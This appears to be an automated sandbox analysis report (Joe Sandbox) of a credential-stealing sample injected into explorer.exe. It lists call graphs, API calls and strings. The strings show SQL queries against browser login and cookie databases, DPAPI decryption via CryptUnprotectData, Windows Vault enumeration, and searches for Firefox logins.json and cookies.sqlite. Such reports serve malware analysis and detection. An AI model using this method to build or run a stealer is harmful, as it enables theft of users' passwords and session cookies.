calls 27212->27244 27213->27170 27266 3001162 VirtualQuery 27215->27266 27218 300102d 27218->27164 27219 300101d GetProcessHeap RtlFreeHeap 27219->27218 27220->27174 27221->27189 27222->27193 27223->27189 27224->27179 27225->27184 27226->27188 27227->27181 27268 30537cb 27228->27268 27232 3053095 27231->27232 27235 305308e 27231->27235 27233 30530ad 27232->27233 27258 30066ce 17 API calls 27232->27258 27233->27235 27236 30530ed memset 27233->27236 27235->27206 27237 3053108 27236->27237 27240 3053116 27237->27240 27259 300c59d 17 API calls 27237->27259 27240->27235 27245 3006512 27240->27245 27241->27208 27242->27210 27243->27212 27244->27213 27260 300685c 27245->27260 27247 300651d 27247->27235 27248 3006519 27248->27247 27249 300bfec GetSystemInfo 27248->27249 27263 30065bd 27249->27263 27251 300c00e 27252 30065bd 16 API calls 27251->27252 27253 300c01a 27252->27253 27254 30065bd 16 API calls 27253->27254 27255 300c026 27254->27255 27256 30065bd 16 API calls 27255->27256 27257 300c032 27256->27257 27257->27235 27258->27233 27259->27240 27261 305307c 17 API calls 27260->27261 27262 3006861 27261->27262 27262->27248 27264 305307c 17 API calls 27263->27264 27265 30065c2 27264->27265 27265->27251 27267 3001019 27266->27267 27267->27218 27267->27219 27269 30537d6 27268->27269 27270 30537e9 27268->27270 27280 30095b5 17 API calls 27269->27280 27270->27168 27272 30537db 27273 30537df 27272->27273 27276 30537eb 27272->27276 27281 3054da0 17 API calls 27273->27281 27275 3053834 27283 3053865 71 API calls 27275->27283 27276->27275 27278 305381f 27276->27278 27282 3008795 22 API calls 27278->27282 27280->27272 27281->27270 27282->27270 27283->27270 28186 3004440 23 API calls 28086 3069238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28187 3026440 94 API calls 28088 30213ca 102 API calls 28189 3047452 19 API calls 28090 3005e5a 28 API calls 27746 300105d VirtualFree 28191 3042864 25 API calls 28095 3033e6b 20 API calls 28193 301f86a 31 API calls 28194 3004c6d 17 API calls 28096 3020670 _allmul _allmul _allmul _alldvrm 28097 3026e71 21 API calls 28196 3026871 8 API calls 28200 305507d 24 API calls 28201 300b079 20 API calls 28203 301807c 23 API calls 28099 3010284 39 API calls 28207 304348f 27 API calls 27607 3003098 27608 3001b6a 2 API calls 27607->27608 27609 30030af 27608->27609 27615 30033a9 27609->27615 27631 3001000 GetProcessHeap RtlAllocateHeap 27609->27631 27611 30030ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27612 3054bec 89 API calls 27611->27612 27617 3003126 27612->27617 27613 300339b DeleteFileW 27614 3001011 3 API calls 27613->27614 27614->27615 27616 3003392 27619 3053848 76 API calls 27616->27619 27617->27613 27617->27616 27632 30202ec 94 API calls 27617->27632 27619->27613 27620 3003381 27635 301fb92 93 API calls 27620->27635 27622 300319c RtlCompareMemory 27623 30032cd CryptUnprotectData 27622->27623 27630 3003155 27622->27630 27623->27630 27625 30031d0 RtlZeroMemory 27633 3001000 GetProcessHeap RtlAllocateHeap 27625->27633 27627 3001fa7 19 API calls 27627->27630 27628 3001011 3 API calls 27628->27630 27629 3001798 lstrlen 27629->27630 27630->27620 27630->27622 27630->27623 27630->27625 27630->27627 27630->27628 27630->27629 27634 30202ec 94 API calls 27630->27634 27631->27611 27632->27630 27633->27630 27634->27630 27635->27616 28104 3016698 30 API calls 28105 300629a 23 API calls 28211 3042c9e 104 API calls 28109 30056a2 _allrem 27874 30024a4 27877 3002198 RtlZeroMemory GetVersionExW 27874->27877 27878 30021cb LoadLibraryW 27877->27878 27880 300249b 27878->27880 27881 30021fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27878->27881 27882 3002492 FreeLibrary 27881->27882 27890 3002244 27881->27890 27882->27880 27883 300247b 27883->27882 27884 30022e1 RtlCompareMemory 27884->27890 27885 3002365 RtlCompareMemory 27885->27890 27886 3001953 6 API calls 27886->27890 27887 3001011 GetProcessHeap RtlFreeHeap VirtualQuery 27887->27890 27888 30023f8 StrStrIW 27888->27890 27889 30017c0 9 API calls 27889->27890 27890->27882 27890->27883 27890->27884 27890->27885 27890->27886 27890->27887 27890->27888 27890->27889 27891 3002ea5 25 API calls 27892 3009ea7 RtlAllocateHeap 27893 3009ec1 27892->27893 27894 3009ed9 27892->27894 27896 3007f70 17 API calls 27893->27896 27896->27894 28213 301b8a6 90 API calls 28214 301b0aa 84 API calls 28215 3006eb7 24 API calls 28216 30048b1 22 API calls 27923 3002cb5 27924 3002cbe 27923->27924 27925 3001953 6 API calls 27924->27925 27926 3002cc3 27925->27926 27927 3002e17 27926->27927 27928 3001953 6 API calls 27926->27928 27929 3002cd9 27928->27929 27952 3001000 GetProcessHeap RtlAllocateHeap 27929->27952 27931 3002ce9 27953 3001000 GetProcessHeap RtlAllocateHeap 27931->27953 27933 3002cf9 27934 3001b6a 2 API calls 27933->27934 27935 3002d04 27934->27935 27936 3002ded 27935->27936 27937 3002d0c GetPrivateProfileSectionNamesW 27935->27937 27938 3001011 3 API calls 27936->27938 27937->27936 27950 3002d22 27937->27950 27939 3002e02 27938->27939 27940 3001011 3 API calls 27939->27940 27942 3002e09 27940->27942 27941 3002d3f StrStrIW 27943 3002d53 GetPrivateProfileStringW 27941->27943 27944 3002dd7 lstrlenW 27941->27944 27945 3001011 3 API calls 27942->27945 27943->27944 27946 3002d72 GetPrivateProfileIntW 27943->27946 27944->27936 27944->27950 27947 3002e10 27945->27947 27946->27950 27948 3001011 3 API calls 27947->27948 27948->27927 27949 3001953 6 API calls 27949->27950 27950->27936 27950->27941 27950->27944 27950->27949 27951 3001011 3 API calls 27950->27951 27951->27950 27952->27931 27953->27933 28217 30178b9 33 API calls 28112 30212bb _allmul _allmul _allmul _alldvrm _allmul 28218 30213ca 87 API calls 28114 30213ca 89 API calls 28115 30096bc _alldiv _alldiv _alldiv _alldiv _allmul 28220 3005cc5 22 API calls 28120 302faca _allmul strcspn 28221 3006eb7 22 API calls 28222 3015cca 32 API calls 28224 30534ca 57 API calls 28124 302c6da 23 API calls 28228 30370de 24 API calls 27897 3009ee8 27898 3009ef1 RtlFreeHeap 27897->27898 27899 3009f1a 27897->27899 27898->27899 27900 3009f02 27898->27900 27902 3007f70 17 API calls 27900->27902 27902->27899 28231 300f4ec 20 API calls 28126 3039ef6 114 API calls 28232 3004cf5 memset 28233 30213ca 89 API calls 27962 30028f8 27963 3002900 27962->27963 27964 3002ac8 27962->27964 27994 3001000 GetProcessHeap RtlAllocateHeap 27963->27994 27965 3053848 76 API calls 27964->27965 27967 3002ad1 DeleteFileW 27965->27967 27969 3001011 3 API calls 27967->27969 27968 300290e 27995 30202ec 94 API calls 27968->27995 27971 3002adf 27969->27971 27972 3002a8b 27999 301fb92 93 API calls 27972->27999 27974 3002a98 lstrlen 27975 3002ac1 27974->27975 27976 3002aa4 27974->27976 27977 3001011 3 API calls 27975->27977 28000 3001798 lstrlen 27976->28000 27977->27964 27979 3002ab1 28001 3001798 lstrlen 27979->28001 27981 3002ab9 28002 3001798 lstrlen 27981->28002 27983 3001fa7 19 API calls 27988 3002919 27983->27988 27984 30029da lstrlen 27985 30029eb lstrlen 27984->27985 27984->27988 27985->27988 27988->27972 27988->27983 27988->27984 27996 3001000 GetProcessHeap RtlAllocateHeap 27988->27996 27997 3002112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27988->27997 27998 30202ec 94 API calls 27988->27998 27990 3002a25 wsprintfA lstrlen 27991 3002a58 27990->27991 27992 3002a6a lstrcat 27990->27992 27991->27992 27993 3001011 3 API calls 27992->27993 27993->27988 27994->27968 27995->27988 27996->27988 27997->27990 27998->27988 27999->27974 28000->27979 28001->27981 28002->27975

                        Executed Functions

                        Function 03003717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 3003717-3003730 call 3001b6a 3 3003736-300374c 0->3 4 3003c37-3003c3d 0->4 5 3003762-300379c call 3001000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 300374e-300375e call 300302d 3->6 11 30037a8-30037b5 call 3054bec 5->11 12 300379e-30037a3 call 300349b 5->12 6->5 16 3003c15-3003c1e DeleteFileW call 3001011 11->16 17 30037bb-30037d3 call 303eeb8 11->17 12->11 21 3003c23-3003c28 16->21 22 30037d9-30037f1 call 3001000 call 30202ec 17->22 23 3003c0c-3003c10 call 3053848 17->23 21->4 24 3003c2a-3003c32 call 3002ffa 21->24 31 3003bd0-3003be3 call 301fb92 lstrlen 22->31 32 30037f7 22->32 23->16 24->4 38 3003c05-3003c07 call 3001011 31->38 39 3003be5-3003c00 call 3001798 * 3 31->39 34 30037fc-3003816 call 3001fa7 32->34 40 3003bb6-3003bc6 call 30202ec 34->40 41 300381c-300382d 34->41 38->23 39->38 40->34 55 3003bcc 40->55 44 3003833-3003843 RtlCompareMemory 41->44 45 3003a37-3003a51 CryptUnprotectData 41->45 44->45 49 3003849-300384b 44->49 45->40 51 3003a57-3003a5c 45->51 49->45 54 3003851-3003856 49->54 51->40 52 3003a62-3003a78 call 3001fa7 51->52 61 3003a86-3003a9d call 3001fa7 52->61 62 3003a7a-3003a80 52->62 54->45 58 300385c-3003861 54->58 55->31 58->45 60 3003867-30038ed RtlZeroMemory call 3001000 58->60 73 30038f3-3003909 call 3001fa7 60->73 74 3003a2e-3003a32 60->74 68 3003aab-3003ac2 call 3001fa7 61->68 69 3003a9f-3003aa5 61->69 62->61 64 3003a82 62->64 64->61 79 3003ad0-3003aed call 3001fa7 68->79 80 3003ac4-3003aca 68->80 69->68 71 3003aa7 69->71 71->68 84 3003917-300392d call 3001fa7 73->84 85 300390b-3003911 73->85 77 3003bb1 call 3001011 74->77 77->40 89 3003af7-3003b01 79->89 90 3003aef-3003af1 79->90 80->79 83 3003acc 80->83 83->79 93 300393b-3003952 call 3001fa7 84->93 94 300392f-3003935 84->94 85->84 88 3003913 85->88 88->84 95 3003b03-3003b05 89->95 96 3003b0f-3003b1b lstrlen 89->96 90->89 92 3003af3 90->92 92->89 103 3003960-3003979 call 3001fa7 93->103 104 3003954-300395a 93->104 94->93 97 3003937 94->97 95->96 99 3003b07-3003b0b 95->99 96->40 100 3003b21-3003b2a lstrlen 96->100 97->93 99->96 100->40 102 3003b30-3003b4f call 3001000 100->102 110 3003b51 102->110 111 3003b59-3003b93 call 3002112 wsprintfA lstrlen 102->111 112 3003987-3003993 lstrlen 103->112 113 300397b-3003981 103->113 104->103 106 300395c 104->106 106->103 110->111 118 3003ba3-3003baf lstrcat 111->118 119 3003b95-3003ba1 call 300102f 111->119 112->74 115 3003999-30039a2 lstrlen 112->115 113->112 116 3003983 113->116 115->74 120 30039a8-30039c7 call 3001000 115->120 116->112 118->77 119->118 125 30039d1-3003a0b call 3002112 wsprintfA lstrlen 120->125 126 30039c9 120->126 129 3003a1b-3003a29 lstrcat call 3001011 125->129 130 3003a0d-3003a19 call 300102f 125->130 126->125 129->74 130->129
                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03003778
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003782
                        • DeleteFileW.KERNELBASE(00000000), ref: 03003789
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003794
                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0300383B
                        • RtlZeroMemory.NTDLL(?,00000040), ref: 03003870
                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 0300398B
                        • lstrlen.KERNEL32(00000000), ref: 0300399A
                        • wsprintfA.USER32 ref: 030039F1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 030039FD
                        • lstrcat.KERNEL32(00000000,?), ref: 03003A21
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03003A49
                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03003B13
                        • lstrlen.KERNEL32(00000000), ref: 03003B22
                        • wsprintfA.USER32 ref: 03003B79
                        • lstrlen.KERNEL32(00000000), ref: 03003B85
                        • lstrcat.KERNEL32(00000000,?), ref: 03003BA9
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03003BDA
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03003C16
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$ChangeCloseCompareCopyCreateCryptDataFindNameNotificationPathUnprotectZero
                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                        • API String ID: 2397694182-404540950
                        • Opcode ID: 26e5fb0d9f8342b1feabf890af0d9453c18ef0970d264df87ac776aebbdca7fd
                        • Instruction ID: 937483fc304289242fb9ed29507eb4f4059ed4f23658ffa57fc497547346718d
                        • Opcode Fuzzy Hash: 26e5fb0d9f8342b1feabf890af0d9453c18ef0970d264df87ac776aebbdca7fd
                        • Instruction Fuzzy Hash: E5E1BE7920A341AFE716EF24C844B7FBBE9AFC5344F48496CF5859A290DB75C804CB52
                        Function 03002198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 134 3002198-30021c9 RtlZeroMemory GetVersionExW 135 30021d7-30021dc 134->135 136 30021cb-30021d0 134->136 138 30021de 135->138 139 30021e3-30021f6 LoadLibraryW 135->139 137 30021d2 136->137 136->138 137->135 138->139 140 300249b-30024a3 139->140 141 30021fc-300223e GetProcAddress * 5 139->141 142 3002492-300249a FreeLibrary 141->142 143 3002244-300224a 141->143 142->140 143->142 144 3002250-3002252 143->144 144->142 145 3002258-300225a 144->145 145->142 146 3002260-3002265 145->146 146->142 147 300226b-3002277 146->147 148 300227e-3002280 147->148 148->142 149 3002286-30022a5 148->149 151 300248b-300248f 149->151 152 30022ab-30022b3 149->152 151->142 153 3002483 152->153 154 30022b9-30022c5 152->154 153->151 155 30022c9-30022db 154->155 156 30022e1-30022f1 RtlCompareMemory 155->156 157 3002365-3002375 RtlCompareMemory 155->157 158 3002452-3002475 156->158 160 30022f7-3002348 call 3001953 * 3 156->160 157->158 159 300237b-30023c9 call 3001953 * 3 157->159 158->155 163 300247b-300247f 158->163 176 30023e4-30023ea 159->176 178 30023cb-30023dc call 3001953 159->178 160->176 177 300234e-3002363 call 3001953 160->177 163->153 181 3002431-3002433 176->181 182 30023ec-30023ee 176->182 190 30023e0 177->190 178->190 184 3002435-3002437 call 3001011 181->184 185 300243c-300243e 181->185 187 30023f0-30023f2 182->187 188 300242a-300242c call 3001011 182->188 184->185 192 3002440-3002442 call 3001011 185->192 193 3002447-3002449 185->193 187->188 194 30023f4-30023f6 187->194 188->181 190->176 192->193 193->158 197 300244b-300244d call 3001011 193->197 194->188 196 30023f8-3002406 StrStrIW 194->196 198 3002426 196->198 199 3002408-3002421 call 30017c0 * 3 196->199 197->158 198->188 199->198
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000114), ref: 030021AF
                        • GetVersionExW.KERNEL32(?), ref: 030021BE
                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 030021E8
                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0300220A
                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 03002214
                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 03002220
                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0300222A
                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 03002236
                        • RtlCompareMemory.NTDLL(?,03061110,00000010), ref: 030022E8
                        • RtlCompareMemory.NTDLL(?,03061110,00000010), ref: 0300236C
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 030023FE
                        • FreeLibrary.KERNELBASE(00000000), ref: 03002493
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                        • API String ID: 2583887280-2831467701
                        • Opcode ID: cd8d610a362cfab2703b9c3b8300d38af94920e596ce32489995325f5ce6e731
                        • Instruction ID: a77e333eb75de8115b4b9fd82eb52852483cba261e5dd42e1526723065187bee
                        • Opcode Fuzzy Hash: cd8d610a362cfab2703b9c3b8300d38af94920e596ce32489995325f5ce6e731
                        • Instruction Fuzzy Hash: 2E91AF75A0A304AFE718DF65C848A6FBBE9BFC8304F44482DF9959B291DB71D801CB42
                        Function 03003098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 261 3003098-30030b1 call 3001b6a 264 30030b7-30030cd 261->264 265 30033ba-30033c0 261->265 266 30030e3-3003128 call 3001000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 3054bec 264->266 267 30030cf-30030d8 call 300302d 264->267 274 300339b-30033a4 DeleteFileW call 3001011 266->274 275 300312e-3003146 call 303eeb8 266->275 270 30030dd-30030df 267->270 270->266 279 30033a9-30033ab 274->279 280 3003392-3003396 call 3053848 275->280 281 300314c-3003158 call 30202ec 275->281 279->265 282 30033ad-30033b5 call 3002ffa 279->282 280->274 287 3003389-300338d call 301fb92 281->287 288 300315e-3003161 281->288 282->265 287->280 290 3003165-300317f call 3001fa7 288->290 293 3003185-3003196 290->293 294 300336f-300337b call 30202ec 290->294 295 300319c-30031ac RtlCompareMemory 293->295 296 30032cd-30032e7 CryptUnprotectData 293->296 294->290 303 3003381-3003385 294->303 295->296 299 30031b2-30031b4 295->299 296->294 298 30032ed-30032f2 296->298 298->294 301 30032f4-300330a call 3001fa7 298->301 299->296 302 30031ba-30031bf 299->302 308 3003318-300332f call 3001fa7 301->308 309 300330c-3003312 301->309 302->296 305 30031c5-30031ca 302->305 303->287 305->296 307 30031d0-3003253 RtlZeroMemory call 3001000 305->307 319 3003255-300326b call 3001fa7 307->319 320 30032bd 307->320 315 3003331-3003337 308->315 316 300333d-3003343 308->316 309->308 311 3003314 309->311 311->308 315->316 318 3003339 315->318 321 3003351-300336a call 3001798 * 3 316->321 322 3003345-300334b 316->322 318->316 330 3003279-300328e call 3001fa7 319->330 331 300326d-3003273 319->331 324 30032c1-30032c8 call 3001011 320->324 321->294 322->321 325 300334d 322->325 324->294 325->321 339 3003290-3003296 330->339 340 300329c-30032bb call 3001798 * 3 330->340 331->330 334 3003275 331->334 334->330 339->340 341 3003298 339->341 340->324 341->340
                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030030F9
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003103
                        • DeleteFileW.KERNELBASE(00000000), ref: 0300310A
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003115
                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 030031A4
                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030031D7
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030032DF
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0300339C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$DeleteMemoryTemp$ChangeCloseCompareCopyCreateCryptDataFindNameNotificationPathUnprotectZero
                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                        • API String ID: 1468962943-4052020286
                        • Opcode ID: 36bf1c77fa61fab7536363b97ec7432c3f6a47248c4e16ae3d0417f69c02e552
                        • Instruction ID: cff45e094d8b39239ad7fbdc395531ba620f879383039fe17f0d6688658d3da7
                        • Opcode Fuzzy Hash: 36bf1c77fa61fab7536363b97ec7432c3f6a47248c4e16ae3d0417f69c02e552
                        • Instruction Fuzzy Hash: 2791BC7920A341AFE716EF25C884B7FBBE9AFC5744F08492DF5859A290DB35D804CB12
                        Function 03003ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 03003F0A
                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03003F16
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03003F38
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03003F4C
                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03003F69
                        • lstrcmpiW.KERNEL32(?,Local State), ref: 03003F7E
                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03003F9B
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03003FB5
                        • FindClose.KERNELBASE(00000000), ref: 03003FC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                        • String ID: *.*$Local State
                        • API String ID: 3923353463-3324723383
                        • Opcode ID: 97453968c2d68851b53fa98d94ecb97475beb4c87d00772868364ce9a90c9b8c
                        • Instruction ID: 2ace4a465ada8a2351f5736bfcddaaf74f9a071fb2aff5b0688116ff9f91db43
                        • Opcode Fuzzy Hash: 97453968c2d68851b53fa98d94ecb97475beb4c87d00772868364ce9a90c9b8c
                        • Instruction Fuzzy Hash: 8021D3392023486BE755F6308C0CA7FB6BCDBC5341F482569F952C61C1DB7A94088662
                        Function 03002B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 03002B3D
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03002B63
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03002B7B
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 03002BE7
                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 03002C16
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03002C43
                        • FindClose.KERNELBASE(00000000), ref: 03002C52
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                        • String ID: \*.*$cookies.sqlite$logins.json
                        • API String ID: 1108783765-3717368146
                        • Opcode ID: 5092c27d232cb4cae03621a09b1f1e5c82ee530465d7b4778140f4ed233aacf3
                        • Instruction ID: 88d66d07cd9048b72aaa50ca65f536bab8ab05f26ca1e836e83a83135df0adbd
                        • Opcode Fuzzy Hash: 5092c27d232cb4cae03621a09b1f1e5c82ee530465d7b4778140f4ed233aacf3
                        • Instruction Fuzzy Hash: 4A31B4383073095BEB19FB70888897F72DEABC4300F485D2CA986DB2C1DF7AC9068251
                        Function 03001D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 531 3001d4a-3001d5c 532 3001d62-3001d66 531->532 533 3001eb4-3001ebe 531->533 532->533 534 3001d6c-3001d77 call 30019b4 532->534 537 3001d79-3001d89 call 3001953 534->537 538 3001d8b-3001d97 call 3001953 534->538 543 3001d9b-3001d9d 537->543 538->543 543->533 544 3001da3-3001db4 FindFirstFileW 543->544 545 3001dba 544->545 546 3001ead-3001eaf call 3001011 544->546 547 3001dbe-3001dc3 545->547 546->533 549 3001dc5-3001dd7 lstrcmpiW 547->549 550 3001e3d-3001e6a call 3001953 call 300199d lstrcmpiW 547->550 552 3001ddd-3001def lstrcmpiW 549->552 553 3001e8e-3001e9c FindNextFileW 549->553 561 3001e87-3001e89 call 3001011 550->561 562 3001e6c-3001e75 call 3001cf7 550->562 552->553 555 3001df5-3001e00 call 30019b4 552->555 553->547 556 3001ea2-3001ea9 FindClose 553->556 563 3001e02-3001e07 555->563 564 3001e09 555->564 556->546 561->553 562->561 570 3001e77-3001e7f 562->570 566 3001e0b-3001e3b call 3001953 call 300199d call 3001d4a 563->566 564->566 566->561 570->561
                        APIs
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03001DA9
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03001DCF
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03001DE7
                        • lstrcmpiW.KERNEL32(?,?), ref: 03001E62
                          • Part of subcall function 03001CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,03002C27), ref: 03001D02
                          • Part of subcall function 03001CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 03001D0D
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03001E94
                        • FindClose.KERNELBASE(00000000), ref: 03001EA3
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                        • String ID: *.*$\*.*
                        • API String ID: 232625764-1692270452
                        • Opcode ID: b2d742ff11d5b5ad68967a4917ed4fa995b9facf1f8b5093a2f5e63cccf37734
                        • Instruction ID: f8807d6f166e0139bcfa50dcd6f6c56972b1d02daa256351685f4b869c2cbdba
                        • Opcode Fuzzy Hash: b2d742ff11d5b5ad68967a4917ed4fa995b9facf1f8b5093a2f5e63cccf37734
                        • Instruction Fuzzy Hash: 1831FA3C3063455BEB59FB748888ABF77EAAFC4340F441A2DE98A872C5DB75C8058752
                        Function 03003E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
